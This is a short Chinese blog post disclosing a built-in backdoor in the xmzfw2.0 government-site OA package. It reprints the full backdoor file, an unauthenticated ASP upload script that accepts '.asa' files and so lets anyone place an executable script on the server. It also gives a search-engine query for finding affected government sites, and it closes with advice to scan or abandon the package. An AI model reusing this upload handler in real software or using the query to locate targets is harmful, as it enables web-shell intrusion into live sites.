博主呓语:

夏茂政府网集成OA完整开源版xmzfw2.0 内置后门

Posted by 破冰 on 2012-6-8 0:55 Friday
后门文件:HXINCLUDE/Admin_Upfile.asp
<%
  Response.Buffer = True
  Server.ScriptTimeOut=9999999
  On Error Resume Next
%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<meta http-equiv="Content-Language" content="zh-cn" />
<meta content="all" name="robots" />
<meta name="author" content="文件上传" />
<meta name="description" content="文件上传" />
<meta name="keywords" content="文件上传" />
<style type="text/css">
<!--
body,input {font-size:12px;}
-->
</style>
<title>文件上传脚本</title>
</head>
<body id="body">
<%
 [color=Red] ExtName = [color=Red]"jpg,gif,txt,asa" [/color]   '允许扩展名[/color]  SavePath = "/"          '保存路径
  If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" '在目录后加(/)
  CheckAndCreateFolder(SavePath)

  UpLoadAll_a = Request.TotalBytes '取得客户端全部内容
  If(UpLoadAll_a>0) Then
    Set UploadStream_c = Server.CreateObject("ADODB.Stream")
    UploadStream_c.Type = 1
    UploadStream_c.Open
    UploadStream_c.Write Request.BinaryRead(UpLoadAll_a)
    UploadStream_c.Position = 0

    FormDataAll_d = UploadStream_c.Read
    CrLf_e = chrB(13)&chrB(10)
    FormStart_f = InStrB(FormDataAll_d,CrLf_e)
    FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e)

    Set FormStream_h = Server.Createobject("ADODB.Stream")
    FormStream_h.Type = 1
    FormStream_h.Open
    UploadStream_c.Position = FormStart_f + 1
    UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3
    FormStream_h.Position = 0
    FormStream_h.Type = 2
    FormStream_h.CharSet = "GB2312"
    FormStreamText_i = FormStream_h.Readtext
    FormStream_h.Close

    FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g)

    If(CheckFileExt(FileName_j,ExtName)) Then
      SaveFile = Server.MapPath(SavePath & FileName_j)

      If Err Then
        Response.Write "文件上传: <span style=""color:red;"">文件上传出错!</span> <a href=""" & Request.ServerVariables("URL") &""">重新上传文件</a>"
        Err.Clear
      Else
        SaveFile = CheckFileExists(SaveFile)

        k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4
        l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2
        FormStream_h.Type=1
        FormStream_h.Open
        UploadStream_c.Position=k-1
        UploadStream_c.CopyTo FormStream_h,l
        FormStream_h.SaveToFile SaveFile,2

        SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1)
        Response.write "文件上传: <span style=""color:red;"">" & SaveFileName & " </span>文件上传成功! <a href=""" & Request.ServerVariables("URL") &""">继续上传文件</a>"
      End If
    Else
      Response.write "文件上传: <span style=""color:red;"">文件格式不正确!</span> <a href=""" & Request.ServerVariables("URL") &""">重新上传文件</a>"
    End If

  Else
%>
<script language="Javascript">
<!--
function ValidInput()
{

if(document.upform.upfile.value=="")
  {
    alert("请选择上传文件!")
    document.upform.upfile.focus()
    return false
  }
  return true
}
// -->
</script>
<form action='<%= Request.ServerVariables("URL") %>' method='post' name="upform" onsubmit="return ValidInput()"  enctype="multipart/form-data">
文件上传:
<input type='file' name='upfile' size="40"> <input type='submit' value="上传">
</form>
<%
  End if
  Set FormStream_h = Nothing
  UploadStream.Close
  Set UploadStream = Nothing
%>
</body>
</html>

谷歌或者百度 inurl:a125_news.asp N多政府站点在使用,一些已经被挂黑链了;

允许扩展名哪里有亮点直接允许上传asa···无语喔。

解决办法:查杀下整个代码包,可能后门漏洞不至这一个,最好是别用这个玩意。··有修复起来的精力都重新做一个站了。

发表评论: